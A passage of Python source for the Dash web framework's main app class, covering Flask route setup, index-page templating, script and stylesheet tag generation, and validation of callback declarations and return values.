    Resource registration already happened as a side effect of the
    module imports above, so nothing further is required here.
    """
|
from __future__ import print_function
import itertools
import os
import random
import sys
import collections
import importlib
import json
import pkgutil
import threading
import re
import logging
import pprint
from functools import wraps
import flask
from flask import Flask, Response
from flask_compress import Compress
import plotly
import dash_renderer
from .dependencies import Input, Output, State
from .resources import Scripts, Css
from .development.base_component import Component, ComponentRegistry
from . import exceptions
from ._utils import AttributeDict as _AttributeDict
from ._utils import interpolate_str as _interpolate
from ._utils import format_tag as _format_tag
from ._utils import generate_hash as _generate_hash
from ._utils import patch_collections_abc as _patch_collections_abc
from . import _watch
from ._utils import get_asset_path as _get_asset_path
from ._utils import create_callback_id as _create_callback_id
from ._configs import (get_combined_config, pathname_configs)
from .version import __version__
# Default HTML index page. The {%...%} markers are interpolated at
# request time; the index_string setter validates that required markers
# are present in any custom template.
_default_index = '''<!DOCTYPE html>
<html>
<head>
{%metas%}
<title>{%title%}</title>
{%favicon%}
{%css%}
</head>
<body>
{%app_entry%}
<footer>
{%config%}
{%scripts%}
{%renderer%}
</footer>
</body>
</html>'''
# Placeholder markup shown until dash-renderer mounts the React app.
_app_entry = '''
<div id="react-entry-point">
<div class="_dash-loading">
Loading...
</div>
</div>
'''
# Regexes locating the interpolation markers in index templates.
_re_index_entry = re.compile(r'{%app_entry%}')
_re_index_config = re.compile(r'{%config%}')
_re_index_scripts = re.compile(r'{%scripts%}')
_re_renderer_scripts = re.compile(r'{%renderer%}')
# Regexes used to sanity-check the final rendered index page.
_re_index_entry_id = re.compile(r'id="react-entry-point"')
_re_index_config_id = re.compile(r'id="_dash-config"')
_re_index_scripts_id = re.compile(r'src=".*dash[-_]renderer.*"')
# NOTE(review): no closing quote — appears to be an intentional prefix
# match against the renderer <script> id attribute; confirm upstream.
_re_renderer_scripts_id = re.compile(r'id="_dash-renderer')
class _NoUpdate(object):
# pylint: disable=too-few-public-methods
pass
# Singleton signal to not update an output, alternative to PreventUpdate
# (a single shared instance so it can be compared by identity).
no_update = _NoUpdate()
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments, too-many-locals
class Dash(object):
"""
Dash is a framework for building analytical web applications.
No JavaScript required.
If a parameter can be set by an environment variable, that is listed as:
env: ``DASH_****``
Values provided here take precedence over environment variables.
:param name: The name Flask should use for your app. Even if you provide
your own ``server``, ``name`` will be used to help find assets.
Typically ``__name__`` (the magic global var, not a string) is the
best value to use. Default ``'__main__'``, env: ``DASH_APP_NAME``
:type name: string
:param server: Sets the Flask server for your app. There are three options:
``True`` (default): Dash will create a new server
``False``: The server will be added later via ``app.init_app(server)``
where ``server`` is a ``flask.Flask`` instance.
``flask.Flask``: use this pre-existing Flask server.
:type server: boolean or flask.Flask
:param assets_folder: a path, relative to the current working directory,
for extra files to be used in the browser. Default ``'assets'``.
All .js and .css files will be loaded immediately unless excluded by
``assets_ignore``, and other files such as images will be served if
requested.
:type assets_folder: string
:param assets_url_path: The local urls for assets will be:
``requests_pathname_prefix + assets_url_path + '/' + asset_path``
where ``asset_path`` is the path to a file inside ``assets_folder``.
Default ``'assets'``.
:type assets_url_path: string
:param assets_ignore: A regex, as a string to pass to ``re.compile``, for
assets to omit from immediate loading. Ignored files will still be
served if specifically requested. You cannot use this to prevent access
to sensitive files.
:type assets_ignore: string
:param assets_external_path: an absolute URL from which to load assets.
Use with ``serve_locally=False``. Dash can still find js and css to
automatically load if you also keep local copies in your assets
folder that Dash can index, but external serving can improve
performance and reduce load on the Dash server.
env: ``DASH_ASSETS_EXTERNAL_PATH``
:type assets_external_path: string
:param include_assets_files: Default ``True``, set to ``False`` to prevent
immediate loading of any assets. Assets will still be served if
specifically requested. You cannot use this to prevent access
to sensitive files. env: ``DASH_INCLUDE_ASSETS_FILES``
:type include_assets_files: boolean
:param url_base_pathname: A local URL prefix to use app-wide.
Default ``'/'``. Both `requests_pathname_prefix` and
`routes_pathname_prefix` default to `url_base_pathname`.
env: ``DASH_URL_BASE_PATHNAME``
:type url_base_pathname: string
:param requests_pathname_prefix: A local URL prefix for file requests.
Defaults to `url_base_pathname`, and must end with
`routes_pathname_prefix`. env: ``DASH_REQUESTS_PATHNAME_PREFIX``
:type requests_pathname_prefix: string
:param routes_pathname_prefix: A local URL prefix for JSON requests.
Defaults to ``url_base_pathname``, and must start and end
with ``'/'``. env: ``DASH_ROUTES_PATHNAME_PREFIX``
:type routes_pathname_prefix: string
:param serve_locally: If ``True`` (default), assets and dependencies
(Dash and Component js and css) will be served from local URLs.
If ``False`` we will use CDN links where available.
:type serve_locally: boolean
:param compress: Use gzip to compress files and data served by Flask.
Default ``True``
:type compress: boolean
:param meta_tags: html <meta> tags to be added to the index page.
Each dict should have the attributes and values for one tag, eg:
``{'name': 'description', 'content': 'My App'}``
:type meta_tags: list of dicts
:param index_string: Override the standard Dash index page.
Must contain the correct insertion markers to interpolate various
content into it depending on the app config and components used.
See https://dash.plot.ly/external-resources for details.
:type index_string: string
:param external_scripts: Additional JS files to load with the page.
Each entry can be a string (the URL) or a dict with ``src`` (the URL)
and optionally other ``<script>`` tag attributes such as ``integrity``
and ``crossorigin``.
:type external_scripts: list of strings or dicts
:param external_stylesheets: Additional CSS files to load with the page.
Each entry can be a string (the URL) or a dict with ``href`` (the URL)
and optionally other ``<link>`` tag attributes such as ``rel``,
``integrity`` and ``crossorigin``.
:type external_stylesheets: list of strings or dicts
:param suppress_callback_exceptions: Default ``False``: check callbacks to
ensure referenced IDs exist and props are valid. Set to ``True``
if your layout is dynamic, to bypass these checks.
env: ``DASH_SUPPRESS_CALLBACK_EXCEPTIONS``
:type suppress_callback_exceptions: boolean
:param show_undo_redo: Default ``False``, set to ``True`` to enable undo
and redo buttons for stepping through the history of the app state.
:type show_undo_redo: boolean
:param plugins: Extend Dash functionality by passing a list of objects
with a ``plug`` method, taking a single argument: this app, which will
be called after the Flask server is attached.
:type plugins: list of objects
"""
def __init__(
        self,
        name=None,
        server=True,
        assets_folder='assets',
        assets_url_path='assets',
        assets_ignore='',
        assets_external_path=None,
        include_assets_files=True,
        url_base_pathname=None,
        requests_pathname_prefix=None,
        routes_pathname_prefix=None,
        serve_locally=True,
        compress=True,
        meta_tags=None,
        index_string=_default_index,
        external_scripts=None,
        external_stylesheets=None,
        suppress_callback_exceptions=None,
        show_undo_redo=False,
        plugins=None,
        **obsolete):
    # See the class docstring for the meaning of each parameter.
    # Fail loudly on any kwarg that is not recognized, with a targeted
    # message for the ones removed in Dash v1.0.
    for key in obsolete:
        if key in ['components_cache_max_age', 'static_folder']:
            raise exceptions.ObsoleteKwargException(
                key + ' is no longer a valid keyword argument in Dash '
                'since v1.0. See https://dash.plot.ly for details.'
            )
        # any other kwarg mimic the built-in exception
        raise TypeError(
            "Dash() got an unexpected keyword argument '" + key + "'"
        )
    # We have 3 cases: server is either True (we create the server), False
    # (defer server creation) or a Flask app instance (we use their server)
    if isinstance(server, Flask):
        self.server = server
        if name is None:
            name = getattr(server, 'name', '__main__')
    elif isinstance(server, bool):
        name = name if name else '__main__'
        self.server = Flask(name) if server else None
    else:
        raise ValueError('server must be a Flask app or a boolean')
    base_prefix, routes_prefix, requests_prefix = pathname_configs(
        url_base_pathname, routes_pathname_prefix, requests_pathname_prefix
    )
    # Central app configuration; env-overridable settings go through
    # get_combined_config().
    self.config = _AttributeDict(
        name=name,
        assets_folder=os.path.join(
            flask.helpers.get_root_path(name), assets_folder),
        assets_url_path=assets_url_path,
        assets_ignore=assets_ignore,
        assets_external_path=get_combined_config(
            'assets_external_path', assets_external_path, ''),
        include_assets_files=get_combined_config(
            'include_assets_files', include_assets_files, True),
        url_base_pathname=base_prefix,
        routes_pathname_prefix=routes_prefix,
        requests_pathname_prefix=requests_prefix,
        serve_locally=serve_locally,
        compress=compress,
        meta_tags=meta_tags or [],
        external_scripts=external_scripts or [],
        external_stylesheets=external_stylesheets or [],
        suppress_callback_exceptions=get_combined_config(
            'suppress_callback_exceptions',
            suppress_callback_exceptions,
            False),
        show_undo_redo=show_undo_redo
    )
    # Settings that cannot change after construction.
    self.config.set_read_only([
        'name',
        'assets_folder',
        'assets_url_path',
        'url_base_pathname',
        'routes_pathname_prefix',
        'requests_pathname_prefix',
        'serve_locally',
        'compress',
    ], 'Read-only: can only be set in the Dash constructor')
    self.config.finalize(
        'Invalid config key. Some settings are only available '
        'via the Dash constructor'
    )
    # list of dependencies
    self.callback_map = {}
    # index_string has special setter so can't go in config
    self._index_string = ''
    self.index_string = index_string
    self._favicon = None
    # default renderer string
    self.renderer = 'var renderer = new DashRenderer();'
    # static files from the packages
    self.css = Css(serve_locally)
    self.scripts = Scripts(serve_locally)
    # namespace -> set of registered relative paths (component suites)
    self.registered_paths = collections.defaultdict(set)
    # urls
    self.routes = []
    self._layout = None
    self._cached_layout = None
    self._setup_dev_tools()
    # Shared hot-reload state; mutated by the watcher thread and read by
    # serve_reload_hash(), so access goes through the lock.
    self._hot_reload = _AttributeDict(
        hash=None,
        hard=False,
        lock=threading.RLock(),
        watch_thread=None,
        changed_assets=[]
    )
    self._assets_files = []
    self.logger = logging.getLogger(name)
    self.logger.addHandler(logging.StreamHandler(stream=sys.stdout))
    # Plugins get a chance to hook into the app before server wiring.
    if isinstance(plugins, _patch_collections_abc('Iterable')):
        for plugin in plugins:
            plugin.plug(self)
    if self.server is not None:
        self.init_app()
def init_app(self, app=None):
    """
    Initialize the parts of Dash that require a flask app
    """
    config = self.config
    if app is not None:
        self.server = app
    # Blueprint name includes the route prefix so multiple Dash apps can
    # share a single Flask server without name collisions.
    assets_blueprint_name = '{}{}'.format(
        config.routes_pathname_prefix.replace('/', '_'),
        'dash_assets'
    )
    self.server.register_blueprint(
        flask.Blueprint(
            assets_blueprint_name,
            config.name,
            static_folder=self.config.assets_folder,
            static_url_path='{}{}'.format(
                config.routes_pathname_prefix,
                self.config.assets_url_path.lstrip('/')
            )
        )
    )
    if config.compress:
        # gzip
        Compress(self.server)

    @self.server.errorhandler(exceptions.PreventUpdate)
    def _handle_error(_):
        """Handle a halted callback and return an empty 204 response"""
        return '', 204

    prefix = config.routes_pathname_prefix
    self.server.before_first_request(self._setup_server)
    # add a handler for components suites errors to return 404
    self.server.errorhandler(exceptions.InvalidResourceError)(
        self._invalid_resources_handler)
    # JSON endpoints consumed by dash-renderer:
    self._add_url('{}_dash-layout'.format(prefix), self.serve_layout)
    self._add_url('{}_dash-dependencies'.format(prefix), self.dependencies)
    self._add_url(
        '{}_dash-update-component'.format(prefix),
        self.dispatch,
        ['POST'])
    self._add_url(
        (
            '{}_dash-component-suites'
            '/<string:package_name>'
            '/<path:path_in_package_dist>'
        ).format(prefix),
        self.serve_component_suites)
    self._add_url('{}_dash-routes'.format(prefix), self.serve_routes)
    self._add_url(prefix, self.index)
    self._add_url('{}_reload-hash'.format(prefix), self.serve_reload_hash)
    # catch-all for front-end routes, used by dcc.Location
    self._add_url('{}<path:path>'.format(prefix), self.index)
    self._add_url(
        '{}_favicon.ico'.format(prefix),
        self._serve_default_favicon)
def _add_url(self, name, view_func, methods=('GET',)):
    """Register a Flask URL rule and remember it in ``self.routes``."""
    http_methods = list(methods)
    self.server.add_url_rule(
        name,
        view_func=view_func,
        endpoint=name,
        methods=http_methods)
    # Recorded so the url can be accessed later,
    # e.g. for adding authentication with flask_login.
    self.routes.append(name)
@property
def layout(self):
    """The app's layout: a Dash component, or a callable returning one."""
    return self._layout
def _layout_value(self):
    """Resolve the layout (calling it if callable) and cache the result."""
    layout = self._layout
    if isinstance(layout, _patch_collections_abc('Callable')):
        layout = layout()
    self._cached_layout = layout
    return self._cached_layout
@layout.setter
def layout(self, value):
    """Accept only a Dash component or a callable producing one."""
    acceptable = (Component, _patch_collections_abc('Callable'))
    if not isinstance(value, acceptable):
        raise exceptions.NoLayoutException(
            'Layout must be a dash component '
            'or a function that returns '
            'a dash component.')
    self._layout = value
@property
def index_string(self):
    """The HTML index template; the setter validates required markers."""
    return self._index_string
@index_string.setter
def index_string(self, value):
    """Reject index templates missing any required {%...%} marker."""
    required = (
        (_re_index_entry, 'app_entry'),
        (_re_index_config, 'config'),
        (_re_index_scripts, 'scripts'),
    )
    missing = [label for regex, label in required if not regex.search(value)]
    if missing:
        raise exceptions.InvalidIndexException(
            'Did you forget to include {} in your index string ?'.format(
                ', '.join('{%' + x + '%}' for x in missing)
            )
        )
    self._index_string = value
def serve_layout(self):
    """Serialize the (possibly lazily computed) layout as a JSON response."""
    layout = self._layout_value()
    # TODO - Set browser cache limit - pass hash into frontend
    return flask.Response(
        json.dumps(layout, cls=plotly.utils.PlotlyJSONEncoder),
        mimetype='application/json'
    )
def _config(self):
    """Assemble the config dict consumed by the dash front end."""
    cfg = {
        'url_base_pathname': self.config.url_base_pathname,
        'requests_pathname_prefix': self.config.requests_pathname_prefix,
        'ui': self._dev_tools.ui,
        'props_check': self._dev_tools.props_check,
        'show_undo_redo': self.config.show_undo_redo,
    }
    if not self._dev_tools.hot_reload:
        return cfg
    # convert from seconds to msec as used by js `setInterval`
    cfg['hot_reload'] = {
        'interval': int(self._dev_tools.hot_reload_interval * 1000),
        'max_retry': self._dev_tools.hot_reload_max_retry,
    }
    return cfg
def serve_reload_hash(self):
    """Report hot-reload state to the front end, then reset the flags."""
    _reload = self._hot_reload
    # Snapshot and clear under the lock: these fields are mutated
    # concurrently by the asset-watcher thread.
    with _reload.lock:
        hard = _reload.hard
        changed = _reload.changed_assets
        _hash = _reload.hash
        _reload.hard = False
        _reload.changed_assets = []
    return flask.jsonify({
        'reloadHash': _hash,
        'hard': hard,
        'packages': list(self.registered_paths.keys()),
        'files': list(changed)
    })
def serve_routes(self):
    """Expose the list of registered routes as a JSON response."""
    body = json.dumps(self.routes, cls=plotly.utils.PlotlyJSONEncoder)
    return flask.Response(body, mimetype='application/json')
def _collect_and_register_resources(self, resources):
    """Map resource specs to servable URLs, registering local paths.

    Package-relative paths are recorded in ``self.registered_paths`` so
    that serve_component_suites() will allow them to be requested.
    Returns a list of URL strings (or tag-attribute dicts).
    """
    # now needs the app context.
    # template in the necessary component suite JS bundles
    # add the version number of the package as a query parameter
    # for cache busting
    def _relative_url_path(relative_package_path='', namespace=''):
        # Locate the file inside the installed package; its mtime and
        # the package version become cache-busting query params.
        module_path = os.path.join(
            os.path.dirname(sys.modules[namespace].__file__),
            relative_package_path)
        modified = int(os.stat(module_path).st_mtime)
        return '{}_dash-component-suites/{}/{}?v={}&m={}'.format(
            self.config.requests_pathname_prefix,
            namespace,
            relative_package_path,
            importlib.import_module(namespace).__version__,
            modified
        )
    srcs = []
    for resource in resources:
        # Dynamic resources are registered (so they can be fetched on
        # demand) but not loaded eagerly in the index page.
        is_dynamic_resource = resource.get('dynamic', False)
        if 'relative_package_path' in resource:
            paths = resource['relative_package_path']
            paths = [paths] if isinstance(paths, str) else paths
            for rel_path in paths:
                self.registered_paths[resource['namespace']].add(rel_path)
                if not is_dynamic_resource:
                    srcs.append(_relative_url_path(
                        relative_package_path=rel_path,
                        namespace=resource['namespace']
                    ))
        elif 'external_url' in resource:
            if not is_dynamic_resource:
                if isinstance(resource['external_url'], str):
                    srcs.append(resource['external_url'])
                else:
                    srcs += resource['external_url']
        elif 'absolute_path' in resource:
            raise Exception(
                'Serving files from absolute_path isn\'t supported yet'
            )
        elif 'asset_path' in resource:
            static_url = self.get_asset_url(resource['asset_path'])
            # Add a cache-busting query param
            static_url += '?m={}'.format(resource['ts'])
            srcs.append(static_url)
    return srcs
def _generate_css_dist_html(self):
    """Render <link> tags for external and locally-served stylesheets."""
    local_links = self._collect_and_register_resources(self.css.get_all_css())
    tags = []
    # External stylesheets come first, then registered local ones.
    for link in self.config.external_stylesheets + local_links:
        if isinstance(link, dict):
            tags.append(_format_tag('link', link, opened=True))
        else:
            tags.append('<link rel="stylesheet" href="{}">'.format(link))
    return '\n'.join(tags)
def _generate_scripts_html(self):
    """Render the index page <script> tags in required load order."""
    # Dash renderer has dependencies like React which need to be rendered
    # before every other script. However, the dash renderer bundle
    # itself needs to be rendered after all of the component's
    # scripts have rendered.
    # The rest of the scripts can just be loaded after React but before
    # dash renderer.
    # pylint: disable=protected-access
    mode = 'dev' if self._dev_tools['props_check'] is True else 'prod'
    deps = []
    # Resolve each renderer dependency to its dev or prod bundle.
    for js_dist_dependency in dash_renderer._js_dist_dependencies:
        dep = {}
        for key, value in js_dist_dependency.items():
            dep[key] = value[mode] if isinstance(value, dict) else value
        deps.append(dep)
    dev = self._dev_tools.serve_dev_bundles
    # Order: renderer deps (React), external scripts, component scripts,
    # then the dash-renderer bundle itself.
    srcs = (
        self._collect_and_register_resources(
            self.scripts._resources._filter_resources(
                deps, dev_bundles=dev
            )
        ) +
        self.config.external_scripts +
        self._collect_and_register_resources(
            self.scripts.get_all_scripts(dev_bundles=dev) +
            self.scripts._resources._filter_resources(
                dash_renderer._js_dist, dev_bundles=dev
            )
        )
    )
    return '\n'.join([
        _format_tag('script', src)
        if isinstance(src, dict)
        else '<script src="{}"></script>'.format(src)
        for src in srcs
    ])
def _generate_config_html(self):
    """Embed the front-end config as a JSON <script> tag."""
    payload = json.dumps(self._config())
    template = (
        '<script id="_dash-config" type="application/json">'
        '{}'
        '</script>'
    )
    return template.format(payload)
def _generate_renderer(self):
    """Embed the renderer bootstrap javascript as a <script> tag."""
    template = (
        '<script id="_dash-renderer" type="application/javascript">'
        '{}'
        '</script>'
    )
    return template.format(self.renderer)
def _generate_meta_html(self):
    """Render <meta> tags, injecting IE-compat and charset defaults."""
    meta_tags = self.config.meta_tags
    defaults = []
    # Only inject defaults the user has not supplied explicitly.
    if not any(
            x.get('http-equiv', '') == 'X-UA-Compatible' for x in meta_tags):
        defaults.append(
            '<meta http-equiv="X-UA-Compatible" content="IE=edge">'
        )
    if not any('charset' in x for x in meta_tags):
        defaults.append('<meta charset="UTF-8">')
    tags = defaults + [_format_tag('meta', x, opened=True) for x in meta_tags]
    return '\n      '.join(tags)
# Serve the JS bundles for each package
def serve_component_suites(self, package_name, path_in_package_dist):
    """Serve one registered package file as a flask Response.

    Only package names and exact relative paths previously recorded in
    ``self.registered_paths`` (via _collect_and_register_resources) may
    be served — anything else raises DependencyException, which the
    error handler turns into a 404.
    """
    if package_name not in self.registered_paths:
        raise exceptions.DependencyException(
            'Error loading dependency.\n'
            '"{}" is not a registered library.\n'
            'Registered libraries are: {}'
            .format(package_name, list(self.registered_paths.keys())))
    if path_in_package_dist not in self.registered_paths[package_name]:
        raise exceptions.DependencyException(
            '"{}" is registered but the path requested is not valid.\n'
            'The path requested: "{}"\n'
            'List of registered paths: {}'
            .format(
                package_name, path_in_package_dist, self.registered_paths
            )
        )
    # Mimetype chosen by file extension (js/css/map only).
    mimetype = ({
        'js': 'application/javascript',
        'css': 'text/css',
        'map': 'application/json'
    })[path_in_package_dist.split('.')[-1]]
    return Response(
        pkgutil.get_data(package_name, path_in_package_dist),
        mimetype=mimetype
    )
def index(self, *args, **kwargs):  # pylint: disable=unused-argument
    """Flask view: render the full HTML index page.

    Collects all generated fragments (meta, css, config, scripts,
    renderer, favicon), interpolates them into the index template via
    :meth:`interpolate_index`, then validates that the required elements
    survived a potential user override of the template.

    :raises exceptions.InvalidIndexException: if a required element is
        missing from the interpolated index.
    """
    scripts = self._generate_scripts_html()
    css = self._generate_css_dist_html()
    config = self._generate_config_html()
    metas = self._generate_meta_html()
    renderer = self._generate_renderer()
    title = getattr(self, 'title', 'Dash')
    if self._favicon:
        # Cache-bust user favicons with their modification time.
        favicon_mod_time = os.path.getmtime(
            os.path.join(self.config.assets_folder, self._favicon))
        favicon_url = self.get_asset_url(self._favicon) + '?m={}'.format(
            favicon_mod_time
        )
    else:
        # Fall back to the bundled favicon, cache-busted by dash version.
        favicon_url = '{}_favicon.ico?v={}'.format(
            self.config.requests_pathname_prefix,
            __version__)
    favicon = _format_tag('link', {
        'rel': 'icon',
        'type': 'image/x-icon',
        'href': favicon_url
    }, opened=True)
    index = self.interpolate_index(
        metas=metas, title=title, css=css, config=config,
        scripts=scripts, app_entry=_app_entry, favicon=favicon,
        renderer=renderer)
    # Each pair: (regex match or None, name shown in the error message).
    # FIX: the config element rendered by _generate_config_html has id
    # "_dash-config" (singular); the message previously said
    # "#_dash-configs", which does not match any real element.
    checks = (
        (_re_index_entry_id.search(index), '#react-entry-point'),
        (_re_index_config_id.search(index), '#_dash-config'),
        (_re_index_scripts_id.search(index), 'dash-renderer'),
        (_re_renderer_scripts_id.search(index), 'new DashRenderer'),
    )
    missing = [missing for check, missing in checks if not check]
    if missing:
        plural = 's' if len(missing) > 1 else ''
        raise exceptions.InvalidIndexException(
            'Missing element{pl} {ids} in index.'.format(
                ids=', '.join(missing),
                pl=plural
            )
        )
    return index
def interpolate_index(
        self,
        metas='',
        title='',
        css='',
        config='',
        scripts='',
        app_entry='',
        favicon='',
        renderer=''):
    """Build the initial HTML page served for the app.

    Override this method in a subclass to take full control of the HTML.
    Whatever you return must still contain the ``app_entry``, ``config``,
    ``scripts`` and ``renderer`` fragments, or the index check in
    :meth:`index` will raise.

    :Example:

        class MyDash(dash.Dash):
            def interpolate_index(self, **kwargs):
                return '''
                <!DOCTYPE html>
                <html>
                <head><title>My App</title></head>
                <body>
                <div id="custom-header">My custom header</div>
                {app_entry}
                {config}
                {scripts}
                {renderer}
                <div id="custom-footer">My custom footer</div>
                </body>
                </html>
                '''.format(
                    app_entry=kwargs.get('app_entry'),
                    config=kwargs.get('config'),
                    scripts=kwargs.get('scripts'),
                    renderer=kwargs.get('renderer'))

    :param metas: Collected & formatted meta tags.
    :param title: The title of the app.
    :param css: Collected & formatted css dependencies as <link> tags.
    :param config: Configs needed by dash-renderer.
    :param scripts: Collected & formatted scripts tags.
    :param renderer: A script tag that instantiates the DashRenderer.
    :param app_entry: Where the app will render.
    :param favicon: A favicon <link> tag if found in assets folder.
    :return: The interpolated HTML string for the index.
    """
    template = self.index_string
    return _interpolate(
        template,
        app_entry=app_entry,
        config=config,
        scripts=scripts,
        renderer=renderer,
        metas=metas,
        favicon=favicon,
        css=css,
        title=title,
    )
def dependencies(self):
    """Flask view: JSON description of every registered callback."""
    payload = []
    for output_id, spec in self.callback_map.items():
        payload.append({
            'output': output_id,
            'inputs': spec['inputs'],
            'state': spec['state'],
            'clientside_function': spec.get('clientside_function', None),
        })
    return flask.jsonify(payload)
def _validate_callback(self, output, inputs, state):
    """Validate a callback declaration before it is registered.

    Checks, in order: that a layout exists (unless suppressed), that the
    Output/Input/State arguments are well formed and reference existing
    components/properties, that no input is also an output, and that no
    output already has a callback assigned.

    :param output: an Output, or a list/tuple of Outputs (multi-output).
    :param inputs: list/tuple of dash.dependencies.Input.
    :param state: list/tuple of dash.dependencies.State.
    """
    # pylint: disable=too-many-branches
    layout = self._cached_layout or self._layout_value()
    is_multi = isinstance(output, (list, tuple))
    if (layout is None and not self.config.suppress_callback_exceptions):
        # Without a layout, we can't do validation on the IDs and
        # properties of the elements in the callback.
        raise exceptions.LayoutIsNotDefined('''
Attempting to assign a callback to the application but
the `layout` property has not been assigned.
Assign the `layout` property before assigning callbacks.
Alternatively, suppress this warning by setting
`suppress_callback_exceptions=True`
'''.replace(' ', ''))
    # Normalize to a list so single- and multi-output share one code path.
    outputs = output if is_multi else [output]
    for args, obj, name in [(outputs, Output, 'Output'),
                            (inputs, Input, 'Input'),
                            (state, State, 'State')]:
        # Each argument group must itself be a list/tuple...
        if not isinstance(args, (list, tuple)):
            raise exceptions.IncorrectTypeException(
                'The {} argument `{}` must be '
                'a list or tuple of `dash.dependencies.{}`s.'.format(
                    name.lower(), str(args), name
                ))
        for arg in args:
            # ...of the matching dependency type.
            if not isinstance(arg, obj):
                raise exceptions.IncorrectTypeException(
                    'The {} argument `{}` must be '
                    'of type `dash.{}`.'.format(
                        name.lower(), str(arg), name
                    ))
            # Periods are reserved: "id.property" is the callback key format.
            invalid_characters = ['.']
            if any(x in arg.component_id for x in invalid_characters):
                raise exceptions.InvalidComponentIdError(
                    'The element `{}` contains {} in its ID. '
                    'Periods are not allowed in IDs.'.format(
                        arg.component_id, invalid_characters
                    ))
            if not self.config.suppress_callback_exceptions:
                layout_id = getattr(layout, 'id', None)
                arg_id = arg.component_id
                arg_prop = getattr(arg, 'component_property', None)
                # The referenced id must exist in the layout tree (or be
                # the layout root itself).
                if (arg_id not in layout and arg_id != layout_id):
                    raise exceptions.NonExistentIdException('''
Attempting to assign a callback to the
component with the id "{0}" but no
components with id "{0}" exist in the
app\'s layout.\n\n
Here is a list of IDs in layout:\n{1}\n\n
If you are assigning callbacks to components
that are generated by other callbacks
(and therefore not in the initial layout), then
you can suppress this exception by setting
`suppress_callback_exceptions=True`.
'''.format(
                        arg_id,
                        list(layout.keys()) + (
                            [layout_id] if layout_id else []
                        )
                    ).replace(' ', ''))
                component = (
                    layout if layout_id == arg_id else layout[arg_id]
                )
                # The property must be declared by the component, or match
                # one of its wildcard property prefixes (e.g. "data-").
                if (arg_prop and
                        arg_prop not in component.available_properties and
                        not any(arg_prop.startswith(w) for w in
                                component.available_wildcard_properties)):
                    raise exceptions.NonExistentPropException('''
Attempting to assign a callback with
the property "{0}" but the component
"{1}" doesn't have "{0}" as a property.\n
Here are the available properties in "{1}":
{2}
'''.format(
                        arg_prop, arg_id, component.available_properties
                    ).replace(' ', ''))
                # Legacy Event objects are no longer supported.
                if hasattr(arg, 'component_event'):
                    raise exceptions.NonExistentEventException('''
Events have been removed.
Use the associated property instead.
'''.replace(' ', ''))
    # State without any Input can never fire.
    if state and not inputs:
        raise exceptions.MissingInputsException('''
This callback has {} `State` {}
but no `Input` elements.\n
Without `Input` elements, this callback
will never get called.\n
(Subscribing to input components will cause the
callback to be called whenever their values change.)
'''.format(
            len(state),
            'elements' if len(state) > 1 else 'element'
        ).replace(' ', ''))
    # An output may not simultaneously be one of the callback's inputs.
    for i in inputs:
        bad = None
        if is_multi:
            for o in output:
                if o == i:
                    bad = o
        else:
            if output == i:
                bad = output
        if bad:
            raise exceptions.SameInputOutputException(
                'Same output and input: {}'.format(bad)
            )
    # A multi-output callback may not list the same output twice.
    if is_multi:
        if len(set(output)) != len(output):
            raise exceptions.DuplicateCallbackOutput(
                'Same output was used more than once in a '
                'multi output callback!\n Duplicates:\n {}'.format(
                    ',\n'.join(
                        k for k, v in
                        ((str(x), output.count(x)) for x in output)
                        if v > 1
                    )
                )
            )
    callback_id = _create_callback_id(output)
    # Flatten already-registered callback ids: multi-output ids are stored
    # as "..a.b...c.d.." and are split back into their individual outputs.
    callbacks = set(itertools.chain(*(
        x[2:-2].split('...')
        if x.startswith('..')
        else [x]
        for x in self.callback_map
    )))
    # Mutable cell so the multi-output closure can report its duplicates.
    ns = {
        'duplicates': set()
    }
    if is_multi:
        def duplicate_check():
            ns['duplicates'] = callbacks.intersection(
                str(y) for y in output
            )
            return ns['duplicates']
    else:
        def duplicate_check():
            return callback_id in callbacks
    if duplicate_check():
        if is_multi:
            msg = '''
Multi output {} contains an `Output` object
that was already assigned.
Duplicates:
{}
'''.format(
                callback_id,
                pprint.pformat(ns['duplicates'])
            ).replace(' ', '')
        else:
            msg = '''
You have already assigned a callback to the output
with ID "{}" and property "{}". An output can only have
a single callback function. Try combining your inputs and
callback functions together into one function.
'''.format(
                output.component_id,
                output.component_property
            ).replace(' ', '')
        raise exceptions.DuplicateCallbackOutput(msg)
@staticmethod
def _validate_callback_output(output_value, output):
    """Walk a callback return value and raise a descriptive error for the
    first value that is not JSON serializable.

    Only called after ``json.dumps`` has already failed, so this is a
    diagnostic pass: it pinpoints the offending value inside a component
    tree and reports its path.

    :param output_value: the value the user's callback returned.
    :param output: the Output dependency, used in the error message.
    :raises exceptions.InvalidCallbackReturnValue: when a bad value is
        found (expected — that is this function's purpose).
    """
    # Types a Dash prop may legally contain (plus lists of them).
    valid = [str, dict, int, float, type(None), Component]
    def _raise_invalid(bad_val, outer_val, path, index=None,
                       toplevel=False):
        # Build a detailed error describing where in the returned tree
        # (or top-level list) the non-serializable value sits.
        bad_type = type(bad_val).__name__
        outer_id = "(id={:s})".format(outer_val.id) \
            if getattr(outer_val, 'id', False) else ''
        outer_type = type(outer_val).__name__
        raise exceptions.InvalidCallbackReturnValue('''
The callback for `{output:s}`
returned a {object:s} having type `{type:s}`
which is not JSON serializable.
{location_header:s}{location:s}
and has string representation
`{bad_val}`
In general, Dash properties can only be
dash components, strings, dictionaries, numbers, None,
or lists of those.
'''.format(
            output=repr(output),
            object='tree with one value' if not toplevel else 'value',
            type=bad_type,
            location_header=(
                'The value in question is located at'
                if not toplevel else
                '''The value in question is either the only value returned,
or is in the top level of the returned list,'''
            ),
            location=(
                "\n" +
                ("[{:d}] {:s} {:s}".format(index, outer_type, outer_id)
                 if index is not None
                 else ('[*] ' + outer_type + ' ' + outer_id))
                + "\n" + path + "\n"
            ) if not toplevel else '',
            bad_val=bad_val
        ).replace(' ', ''))
    def _value_is_valid(val):
        # 'unicode' check keeps Python 2 text values valid by name.
        return (
            # pylint: disable=unused-variable
            any([isinstance(val, x) for x in valid]) or
            type(val).__name__ == 'unicode'
        )
    def _validate_value(val, index=None):
        # val is a Component
        if isinstance(val, Component):
            # pylint: disable=protected-access
            for p, j in val._traverse_with_paths():
                # check each component value in the tree
                if not _value_is_valid(j):
                    _raise_invalid(
                        bad_val=j,
                        outer_val=val,
                        path=p,
                        index=index
                    )
                # Children that are not of type Component or
                # list/tuple not returned by traverse
                # NOTE(review): collections.MutableSequence moved to
                # collections.abc (removed in Python 3.10) — update if
                # targeting 3.10+.
                child = getattr(j, 'children', None)
                if not isinstance(child, (tuple,
                                          collections.MutableSequence)):
                    if child and not _value_is_valid(child):
                        _raise_invalid(
                            bad_val=child,
                            outer_val=val,
